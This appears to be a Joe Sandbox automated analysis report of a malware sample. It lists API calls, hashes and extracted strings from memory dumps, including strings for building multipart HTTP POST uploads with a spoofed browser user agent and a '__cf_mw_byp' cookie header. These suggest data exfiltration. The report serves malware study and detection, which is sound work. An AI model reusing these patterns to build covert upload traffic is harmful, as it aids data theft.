                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.2119111432.00000000005C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 005C0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.2119037784.00000000005C0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.2119244600.0000000000630000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.2119302748.000000000063A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.2119360707.0000000000640000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_5c0000_B43A.jbxd
                                                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: BinaryCryptString$_strlen
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID: 1460654939-0
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: e32ab94453695d9a5916540bbf3bb602cb3c0a341754240d954e3f02cc23cbdc
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 903f925fae838b65a5479fb65ac080a598c83ce33277d1816389eba0e64cdb1c
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e32ab94453695d9a5916540bbf3bb602cb3c0a341754240d954e3f02cc23cbdc
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 84317EB45093418FD344DF29C18875BBBE1BB88718F108A1EF89897390D775DA898F96
                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  • GetLocaleInfoA.KERNEL32(?,00001004,?,00000006,?,?,?,?,?,?,00000000), ref: 00409AB0
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.2118092287.0000000000403000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.2117929397.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.2118008646.0000000000401000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.2118217497.000000000040B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.2118288328.000000000040D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.2118781005.0000000000494000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_400000_B43A.jbxd
                                                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: InfoLocale
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID: 2299586839-0
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: a965f85404f354b67de76e34e14b4e7bb53843fca6730cefa7b47b11aa3bb62b
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: cd97d6e13d0de9e206b852a385487627045e89d73055acfb110a821b9b1a9c63
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a965f85404f354b67de76e34e14b4e7bb53843fca6730cefa7b47b11aa3bb62b
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E1F06570A04248BFDB00EBA59D05A9E7BF9DB44314F50417AE515EA1C2DB74DA048759
                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0061D6C5: _free.LIBCMT ref: 0061D6D8
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 005C2AC0: lstrcatW.KERNEL32 ref: 005C2B29
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 005C2AC0: lstrcatW.KERNEL32 ref: 005C2B41
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 005C2AC0: lstrcatW.KERNEL32 ref: 005C2B58
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 005C2AC0: lstrcatW.KERNEL32 ref: 005C2BBA
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 005C2AC0: lstrcatW.KERNEL32 ref: 005C2BD2
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 005C2AC0: lstrcatW.KERNEL32 ref: 005C2BE9
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 005C2AC0: lstrcatW.KERNEL32 ref: 005C2C01
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 005C2AC0: lstrcatW.KERNEL32 ref: 005C2C18
                                                                                                                                                                                                                                                                                                                                  • lstrcatW.KERNEL32 ref: 005C3177
                                                                                                                                                                                                                                                                                                                                  • lstrcatW.KERNEL32 ref: 005C31A4
                                                                                                                                                                                                                                                                                                                                  • lstrcatW.KERNEL32 ref: 005C31E6
                                                                                                                                                                                                                                                                                                                                  • lstrcatW.KERNEL32 ref: 005C31FE
                                                                                                                                                                                                                                                                                                                                  • lstrcatW.KERNEL32 ref: 005C3215
                                                                                                                                                                                                                                                                                                                                  • lstrcatW.KERNEL32 ref: 005C3242
                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                  • 22fe32036e91556a4cde7662569f, xrefs: 005C2FF1
                                                                                                                                                                                                                                                                                                                                  • 6cdb83d922bef7ae03a9e8852fb4ecb205bef0, xrefs: 005C3105
                                                                                                                                                                                                                                                                                                                                  • f423d2eaa86fbd89954ff2b9804ca08b93468e869155b7869041, xrefs: 005C317D
                                                                                                                                                                                                                                                                                                                                  • 362f0ee17a406988580f4a80424e2ea7595d2ea0554c6194585b, xrefs: 005C3036
                                                                                                                                                                                                                                                                                                                                  • bae785b2ed82e792fe86f1d3, xrefs: 005C30C0
                                                                                                                                                                                                                                                                                                                                  • e4154e92ac7c3de68b6737, xrefs: 005C2FA9, 005C307B
                                                                                                                                                                                                                                                                                                                                  • d1ec3fb8feae4dd7a69f5aca95ae, xrefs: 005C321B
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.2119111432.00000000005C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 005C0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.2119037784.00000000005C0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.2119244600.0000000000630000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.2119302748.000000000063A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.2119360707.0000000000640000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_5c0000_B43A.jbxd
                                                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: lstrcat$_free
                                                                                                                                                                                                                                                                                                                                  • String ID: 22fe32036e91556a4cde7662569f$362f0ee17a406988580f4a80424e2ea7595d2ea0554c6194585b$6cdb83d922bef7ae03a9e8852fb4ecb205bef0$bae785b2ed82e792fe86f1d3$d1ec3fb8feae4dd7a69f5aca95ae$e4154e92ac7c3de68b6737$f423d2eaa86fbd89954ff2b9804ca08b93468e869155b7869041
                                                                                                                                                                                                                                                                                                                                  • API String ID: 1597172325-1602796456
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: c2b821aed7e8cb732550b0e3e5072fac0bd358a477eea3004fd4f65bd626b407
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 42c98a6b673d7d6b6ae36779affcfb1631526655da4146498dba6f8d0ef73cbe
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c2b821aed7e8cb732550b0e3e5072fac0bd358a477eea3004fd4f65bd626b407
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 821206F4D042059FCB04EFA8D986A5EBBF1FF49300F14492DE8899B355E731A958CB92
                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  • ___free_lconv_mon.LIBCMT ref: 006267BF
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00626075: _free.LIBCMT ref: 00626092
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00626075: _free.LIBCMT ref: 006260A4
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00626075: _free.LIBCMT ref: 006260B6
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00626075: _free.LIBCMT ref: 006260C8
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00626075: _free.LIBCMT ref: 006260DA
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00626075: _free.LIBCMT ref: 006260EC
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00626075: _free.LIBCMT ref: 006260FE
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00626075: _free.LIBCMT ref: 00626110
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00626075: _free.LIBCMT ref: 00626122
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00626075: _free.LIBCMT ref: 00626134
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00626075: _free.LIBCMT ref: 00626146
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00626075: _free.LIBCMT ref: 00626158
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00626075: _free.LIBCMT ref: 0062616A
                                                                                                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 006267B4
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 006232E2: RtlFreeHeap.NTDLL(00000000,00000000,?,006262EA,?,00000000,?,?,?,006261F5,?,00000007,?,?,0062693B,?), ref: 006232F8
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 006232E2: GetLastError.KERNEL32(?,?,006262EA,?,00000000,?,?,?,006261F5,?,00000007,?,?,0062693B,?,?), ref: 0062330A
                                                                                                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 006267D6
                                                                                                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 006267EB
                                                                                                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 006267F6
                                                                                                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 00626818
                                                                                                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 0062682B
                                                                                                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 00626839
                                                                                                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 00626844
                                                                                                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 0062687C
                                                                                                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 00626883
                                                                                                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 006268A0
                                                                                                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 006268B8
                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.2119111432.00000000005C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 005C0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.2119037784.00000000005C0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.2119244600.0000000000630000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.2119302748.000000000063A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.2119360707.0000000000640000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_5c0000_B43A.jbxd
                                                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                                                                                                                                                                                                                                                                  • String ID: (c$hc
                                                                                                                                                                                                                                                                                                                                  • API String ID: 161543041-32530488
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 45e4f2bf1e6a675c84872c575cf850f1894d5ba2ce13e21860aebff864936bf8
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 6f9d8b314068881fa1e955116e9e38baedbb1faa792c6e037c0bcdbe9199edd2
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 45e4f2bf1e6a675c84872c575cf850f1894d5ba2ce13e21860aebff864936bf8
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 07313D31500B21DFEB61AA78F886B9673EAAF00350F24442DF455D6291DB79FE808F28
                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.2119111432.00000000005C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 005C0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.2119037784.00000000005C0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.2119244600.0000000000630000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.2119302748.000000000063A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.2119360707.0000000000640000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_5c0000_B43A.jbxd
                                                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: _strlen
                                                                                                                                                                                                                                                                                                                                  • String ID: Content-Disposition: form-data; name="$"$be85de5ipdocierre1
                                                                                                                                                                                                                                                                                                                                  • API String ID: 4218353326-2800077853
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 8d121b2e3c1bcd340b1c8467da58da3bc24943864d67d952819eec8a03e44abc
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 5e36fd9ea3911be445fb004f8e7f2e7a7dc0ec904be5ba976c5ff5f82b3c924e
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8d121b2e3c1bcd340b1c8467da58da3bc24943864d67d952819eec8a03e44abc
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A99129F9E046109FCB00EF78D985859BBF5FF8A304B1545ADE945AB324E731A848CF92
                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.2119111432.00000000005C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 005C0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.2119037784.00000000005C0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.2119244600.0000000000630000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.2119302748.000000000063A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.2119360707.0000000000640000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_5c0000_B43A.jbxd
                                                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: _strlen
                                                                                                                                                                                                                                                                                                                                  • String ID: Content-Disposition: form-data; name="$"; f$Content-Type: attachment/x-object$ame=$be85de5ipdocierre1$file$ilen
                                                                                                                                                                                                                                                                                                                                  • API String ID: 4218353326-555925414
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 0346f2ce3d380e37785278566179b68e47e1525a90c379fb93cc8d28412880e7
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 41e30a06cd5295f0166aa12101e27e216499a3bf458faaf0d0df5640bee8674f
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0346f2ce3d380e37785278566179b68e47e1525a90c379fb93cc8d28412880e7
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 204178F6500625AFC762DF04DC86E9677F8FF16308B094168E8098B30AE735B658CB97
                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  • GetModuleHandleW.KERNEL32(KERNEL32.DLL,0040C310,0000000C,004051FE,00000000,00000000,?,00404543,00000003,?,?,?,?,?,?,0040401B), ref: 004050D5
                                                                                                                                                                                                                                                                                                                                  • __crt_waiting_on_module_handle.LIBCMT ref: 004050E0
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 004041D5: Sleep.KERNEL32(000003E8,00000000,?,00405026,KERNEL32.DLL,?,00405072,?,00404543,00000003), ref: 004041E1
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 004041D5: GetModuleHandleW.KERNEL32(?,?,00405026,KERNEL32.DLL,?,00405072,?,00404543,00000003,?,?,?,?,?,?,0040401B), ref: 004041EA
                                                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,EncodePointer), ref: 00405109
                                                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(?,DecodePointer), ref: 00405119
                                                                                                                                                                                                                                                                                                                                  • __lock.LIBCMT ref: 0040513B
                                                                                                                                                                                                                                                                                                                                  • InterlockedIncrement.KERNEL32(004921F0), ref: 00405148
                                                                                                                                                                                                                                                                                                                                  • __lock.LIBCMT ref: 0040515C
                                                                                                                                                                                                                                                                                                                                  • ___addlocaleref.LIBCMT ref: 0040517A
                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.2118092287.0000000000403000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.2117929397.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.2118008646.0000000000401000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.2118217497.000000000040B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.2118288328.000000000040D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.2118781005.0000000000494000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_400000_B43A.jbxd
                                                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: AddressHandleModuleProc__lock$IncrementInterlockedSleep___addlocaleref__crt_waiting_on_module_handle
                                                                                                                                                                                                                                                                                                                                  • String ID: 'I$DecodePointer$EncodePointer$KERNEL32.DLL
                                                                                                                                                                                                                                                                                                                                  • API String ID: 1028249917-1081375787
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 40474d4922cdbc7b7b9f4ecfa6fffe8a2f1e0e6e1ffd086e7c8c2280af1a5aac
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 65e6684043b26e880ef1d5393acb9a614fc661c3aa4d4bf651c2f4caaf7348c1
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 40474d4922cdbc7b7b9f4ecfa6fffe8a2f1e0e6e1ffd086e7c8c2280af1a5aac
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C2115B70940B05EAD7209F669945B5BBBE4EF44314F20453FE4A9B72E1CB7899408F9C
                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  • wsprintfW.USER32 ref: 005F7D37
                                                                                                                                                                                                                                                                                                                                  • wsprintfW.USER32 ref: 005F7DB2
                                                                                                                                                                                                                                                                                                                                  • WinHttpAddRequestHeaders.WINHTTP ref: 005F7DD7
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0061D6C5: _free.LIBCMT ref: 0061D6D8
                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.2119111432.00000000005C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 005C0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.2119037784.00000000005C0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.2119244600.0000000000630000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.2119302748.000000000063A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.2119360707.0000000000640000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_5c0000_B43A.jbxd
                                                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: wsprintf$HeadersHttpRequest_free
                                                                                                                                                                                                                                                                                                                                  • String ID: Content-Type: multipart/form-data; boundary=%s$Cookie: __cf_mw_byp=%hs$Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36$P$POST$be85de5ipdocierre1$winhttp.dll
                                                                                                                                                                                                                                                                                                                                  • API String ID: 2458437650-2783096789
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 90cdbcdf5524bee835e21db5fe9bf2bd4300f36e9b84a327122d4bcc403a43f4
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: e34da8ef632cad8b99386e6d506471de06a1fa2ac3d7e9d3a8aafa58faf0403d
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 90cdbcdf5524bee835e21db5fe9bf2bd4300f36e9b84a327122d4bcc403a43f4
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 26A188B480C3459FD714EF68D59466AFBE2FF88704F018D2EE89887350D7789989CB86
                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  • lstrcatW.KERNEL32(00000000,?), ref: 005C2A33
                                                                                                                                                                                                                                                                                                                                  • lstrcatW.KERNEL32(00000000,00000000), ref: 005C2A46
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0061D6C5: _free.LIBCMT ref: 0061D6D8
                                                                                                                                                                                                                                                                                                                                  • lstrcatW.KERNEL32(00000000,?), ref: 005C2A56
                                                                                                                                                                                                                                                                                                                                  • lstrcatW.KERNEL32(00000000,?), ref: 005C2A6C
                                                                                                                                                                                                                                                                                                                                  • lstrcatW.KERNEL32(00000000,006300F2), ref: 005C2A74
                                                                                                                                                                                                                                                                                                                                  • lstrcatW.KERNEL32(00000000,?), ref: 005C2A7A
                                                                                                                                                                                                                                                                                                                                  • lstrcatW.KERNEL32(00000000,00000000), ref: 005C2A8D
                                                                                                                                                                                                                                                                                                                                  • lstrcatW.KERNEL32(00000000,?), ref: 005C2A9D
                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                  • 45538e52191fe131243fae173d27eb3c363ae13c6500eb26313ae035360f, xrefs: 005C2A35
                                                                                                                                                                                                                                                                                                                                  • aab58e5185f0f625cfdbfd38c5dbfd7e, xrefs: 005C2A7C
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.2119111432.00000000005C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 005C0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.2119037784.00000000005C0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.2119244600.0000000000630000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.2119302748.000000000063A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.2119360707.0000000000640000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_5c0000_B43A.jbxd
                                                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: lstrcat$_free
                                                                                                                                                                                                                                                                                                                                  • String ID: 45538e52191fe131243fae173d27eb3c363ae13c6500eb26313ae035360f$aab58e5185f0f625cfdbfd38c5dbfd7e
                                                                                                                                                                                                                                                                                                                                  • API String ID: 1597172325-820533355
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 139277be9cd58648f92efa1577dd49b10e81887e2ef109791d264b360e5d1b4b
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 12e0e50d68807d99d12898bb2ac8c59d81045621c34971cb0160546ea85aa455
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 139277be9cd58648f92efa1577dd49b10e81887e2ef109791d264b360e5d1b4b
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6901F9B26802043BEA0137A19C43F6F395EDF97B98F050028FA0855182EA67D95593FB
                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 006226C6
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 006232E2: RtlFreeHeap.NTDLL(00000000,00000000,?,006262EA,?,00000000,?,?,?,006261F5,?,00000007,?,?,0062693B,?), ref: 006232F8
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 006232E2: GetLastError.KERNEL32(?,?,006262EA,?,00000000,?,?,?,006261F5,?,00000007,?,?,0062693B,?,?), ref: 0062330A
                                                                                                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 006226D2
                                                                                                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 006226DD
                                                                                                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 006226E8
                                                                                                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 006226F3
                                                                                                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 006226FE
